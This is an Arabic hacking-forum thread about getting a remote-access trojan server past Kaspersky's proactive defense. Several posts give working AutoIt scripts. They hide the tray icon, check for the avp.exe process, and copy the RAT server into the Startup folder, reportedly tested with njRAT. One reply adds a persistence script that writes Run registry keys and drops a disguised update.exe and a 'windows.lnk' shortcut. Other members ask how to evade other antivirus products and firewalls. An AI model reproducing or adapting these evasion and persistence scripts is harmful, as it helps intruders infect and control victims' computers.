Follow us on Twitter Follow us on Facebook Watch us on YouTube





العودة   development-point > [ أقســـام إختراق و حماية الأجهزة ] > قسم إختراق الأجـهـزه والأيـمـيـلات


تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

السّلام عليكم جمعة مباركة نتمنّاها للجميع الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها راجعت بعض الأسطوانات عندي للغة

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم منذ /02-22-2013, 01:29 PM   #1
الباتش النّائم
Creator

الصورة الرمزية الباتش النّائم

الباتش النّائم غير متواجد حالياً

 رقم العضوية : 707
 تاريخ التسجيل : Feb 2013
 العمر : 40
 الجنس : ~ ذكر
 البلد : أرض الله الواســـــعة
 المشاركات : 9
 إهتمامك : الشّيرينجـــ
 النقاط : 20
 قوة التقييم : الباتش النّائم is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
Wink تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

"أدخلـ, للتّطوير", للكاسبر, الدّفاع, الإستباقي, تخطّي

السّلام عليكم

جمعة مباركة نتمنّاها للجميع

الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها

راجعت بعض الأسطوانات عندي للغة AutoiT فوجدتــ أحدها يتكلّم عن العبارة الشّرطيّة if

قلت لما لا أطبّقها و أرى النّتيجة يعني " إن .....فـ"

مبدأ الفكرة:


هو أن جميع برامج البدأ تشتغل قبل الكاسبر ، يعني قبل هو ما يتحرّك يكون السّيرفر قد

ثبّت و لا مجال لمراقبته

سلبيّاتها:


لازم الشّخص المستهدف يعمل روستارت للجهاز ( يعني راح يعمل روستارت يعمل)

المتطلّبات:

*1 سيرفر كلين من الكاسبر لأيّ برنامج إختراقـ

*2 إعداداتك كاملة ( تثبيت في الرّيجيستري، مع التّشغيل و و و ....)

*3 برنامج الـ AutoiT (موجود في الموقع الرّسمي )

و لنبدأ على بركة الله بشرح الـ script المراد كتابته :

*1 نضع الشّرط : إن كان الكاسبر شغّالـ

*2 جواب الشّرط: السّيرفر لا يشتغل بل ينسخ نفسه في StartUp

يعني بمجرّد ما يشتغل الكمبيوتر يستغل السّيرفر

*3 إن كان العكس يشتغل السّيرفر مباشرة ( إضافةفقط)

الكود جاهز و قابل للإضافات


كود:
#NoTrayIcon
Opt("TrayIconHide", 1)
if ProcessExists("avp.exe") Then
FileCopy("server.exe",@startupDir)
Else
Run("server.exe")
EndIf
للعلم فقد تمّ تجربته قبل وضع هنا على Njrat و السّلام عليكم



jo'~d hg]~thu hgYsjfhrd gg;hsfv "H]ogJ ggj~',dv"






  رد مع اقتباس
قديم منذ /02-22-2013, 02:58 PM   #2
EDZw4sS!m
.:: V.I.B ::.

الصورة الرمزية EDZw4sS!m

EDZw4sS!m غير متواجد حالياً

 رقم العضوية : 20
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 البلد : #تونسي & مكشخ حربي#
 المشاركات : 617
 إهتمامك : spam
 النقاط : 80
 قوة التقييم : EDZw4sS!m will become famous soon enough

شكراً: 0
تم شكره 3 مرة في 3 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

مشكور يعطيك العافية
جاري الجربة






  رد مع اقتباس
قديم منذ /02-22-2013, 04:25 PM   #3
MR:HACK
Creator

الصورة الرمزية MR:HACK

MR:HACK غير متواجد حالياً

 رقم العضوية : 394
 تاريخ التسجيل : Jan 2013
 الجنس : ~ ذكر
 المشاركات : 100
 النقاط : 80
 قوة التقييم : MR:HACK will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

مــشـــــكور اخي

بارك الله فيك


لكن استفسار بعد اذنك

ممكن ان اضع اكثر من بروسيس حماية في السكريبت

يعني

اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ





منتظرك






  رد مع اقتباس
قديم منذ /02-22-2013, 05:54 PM   #4
ThE CrEzY
Creator

الصورة الرمزية ThE CrEzY

ThE CrEzY غير متواجد حالياً

 رقم العضوية : 535
 تاريخ التسجيل : Jan 2013
 العمر : 30
 الجنس : ~ ذكر
 البلد : M
 المشاركات : 52
 إهتمامك : الاستفادة والافادة
 النقاط : 24
 قوة التقييم : ThE CrEzY is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة mr:hack مشاهدة المشاركة
مــشـــــكور اخي

بارك الله فيك


لكن استفسار بعد اذنك

ممكن ان اضع اكثر من بروسيس حماية في السكريبت

يعني

اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ





منتظرك
نعم فالامر سهل

كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة

بالتوفيق






  رد مع اقتباس
قديم منذ /02-22-2013, 06:07 PM   #5
MR:HACK
Creator

الصورة الرمزية MR:HACK

MR:HACK غير متواجد حالياً

 رقم العضوية : 394
 تاريخ التسجيل : Jan 2013
 الجنس : ~ ذكر
 المشاركات : 100
 النقاط : 80
 قوة التقييم : MR:HACK will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة the crezy مشاهدة المشاركة
نعم فالامر سهل

كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة

بالتوفيق


طيب , ممكن اسماء البروسيس

لجميع انواع الحمايات ( التي لها دفاعات استباقية )





منتظرك






  رد مع اقتباس
قديم منذ /02-22-2013, 06:18 PM   #6
ThE CrEzY
Creator

الصورة الرمزية ThE CrEzY

ThE CrEzY غير متواجد حالياً

 رقم العضوية : 535
 تاريخ التسجيل : Jan 2013
 العمر : 30
 الجنس : ~ ذكر
 البلد : M
 المشاركات : 52
 إهتمامك : الاستفادة والافادة
 النقاط : 24
 قوة التقييم : ThE CrEzY is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة MR:HACK مشاهدة المشاركة



طيب , ممكن اسماء البروسيس

لجميع انواع الحمايات ( التي لها دفاعات استباقية )





منتظرك

لا اعرفها اخي للاسف ( يمكنك البحث في قوقل )







  رد مع اقتباس
قديم منذ /02-23-2013, 02:09 PM   #7
الباتش النّائم
Creator

الصورة الرمزية الباتش النّائم

الباتش النّائم غير متواجد حالياً

 رقم العضوية : 707
 تاريخ التسجيل : Feb 2013
 العمر : 40
 الجنس : ~ ذكر
 البلد : أرض الله الواســـــعة
 المشاركات : 9
 إهتمامك : الشّيرينجـــ
 النقاط : 20
 قوة التقييم : الباتش النّائم is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

MR:HACK
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ
كود:
If ProcessExists("avp.exe")
إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ
كود:
FileCopy("server.exe",@StartupCommonDir)
*2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره

قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا

كود:
FileCopy("server.exe",@StartupCommonDir,1)
و الكود ككلّ يصبح

كود:
#NoTrayIcon
Opt("TrayIconHide", 1)
If ProcessExists("avp.exe") Then
	FileCopy("server.exe",@StartupCommonDir)
Else
	FileCopy("server.exe",@StartupCommonDir,1)
EndIf






  رد مع اقتباس
قديم منذ /02-23-2013, 02:15 PM   #8
الباتش النّائم
Creator

الصورة الرمزية الباتش النّائم

الباتش النّائم غير متواجد حالياً

 رقم العضوية : 707
 تاريخ التسجيل : Feb 2013
 العمر : 40
 الجنس : ~ ذكر
 البلد : أرض الله الواســـــعة
 المشاركات : 9
 إهتمامك : الشّيرينجـــ
 النقاط : 20
 قوة التقييم : الباتش النّائم is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

هذا كود إضافي من أحد الأصدقاء تستطيع به تشغيلـ سيرفر الـCyber و الـ Xtrem

تقولي لماذا هما فقط أقلّك شرطه:

* لا تفعّل خاصيّة البدأ مع الويندوز Run على البرنامج

* لا تفعّل خاصيّة الحقن

* لا تفعّل خاصيّة التّبيت بالروجيستري

السّكريبت يقوم بذلك المهم السّيرفر يكون كلين


كود:
if Not FileExists(@AppDataDir&"\Microsoft\update.exe") Then
        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")
        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")
        FileCreateShortcut("%APPDATA%\Microsoft\update.exe", @StartupDir & "\windows.lnk", "%APPDATA%\Microsoft\", "", "windows", @SystemDir & "\shell32.dll", "", "4", @SW_MINIMIZE)
        FileInstall("update.exe",@AppDataDir&"\Microsoft\update.exe",1)
EndIf
update.exe هو إسم سيرفرك و إختراقات موفّقة






  رد مع اقتباس
قديم منذ /02-23-2013, 02:24 PM   #9
Dr..ViRuS
Very Excellent

الصورة الرمزية Dr..ViRuS

Dr..ViRuS غير متواجد حالياً

 رقم العضوية : 573
 تاريخ التسجيل : Feb 2013
 الجنس : ~ ذكر
 المشاركات : 177
 النقاط : 69
 قوة التقييم : Dr..ViRuS will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

يعطيكـ العافيه ياغالي يستفيدو منو الشباب وفي كمان شفت شرح

تخطي الدفاع الاستباقي افيرا

موفق يابعدي






  رد مع اقتباس
قديم منذ /02-24-2013, 02:56 AM   #10
MR:HACK
Creator

الصورة الرمزية MR:HACK

MR:HACK غير متواجد حالياً

 رقم العضوية : 394
 تاريخ التسجيل : Jan 2013
 الجنس : ~ ذكر
 المشاركات : 100
 النقاط : 80
 قوة التقييم : MR:HACK will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة الباتش النّائم مشاهدة المشاركة
mr:hack
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ
كود:
if processexists("avp.exe")
إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ
كود:
filecopy("server.exe",@startupcommondir)
*2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره

قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا

كود:
filecopy("server.exe",@startupcommondir,1)
و الكود ككلّ يصبح

كود:
#notrayicon
opt("trayiconhide", 1)
if processexists("avp.exe") then
    filecopy("server.exe",@startupcommondir)
else
    filecopy("server.exe",@startupcommondir,1)
endif

اخي الكريم


هل هذا الكود يتخطى جميع الدفاعات الاستباقية للحمايات ؟!؟

و

هل يتخطى الفيروال ؟




منتظرك







  رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
"أدخلـ, للتّطوير", للكاسبر, الدّفاع, الإستباقي, تخطّي

جديد قسم إختراق الأجـهـزه والأيـمـيـلات


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه للموضوع: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[ مشكله ] الدّفاع الإستباقي الباتش النّائم مشاكل وحلول إختراق الأجهزة 7 02-20-2013 12:12 AM


الساعة الآن 01:45 PM

 



Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point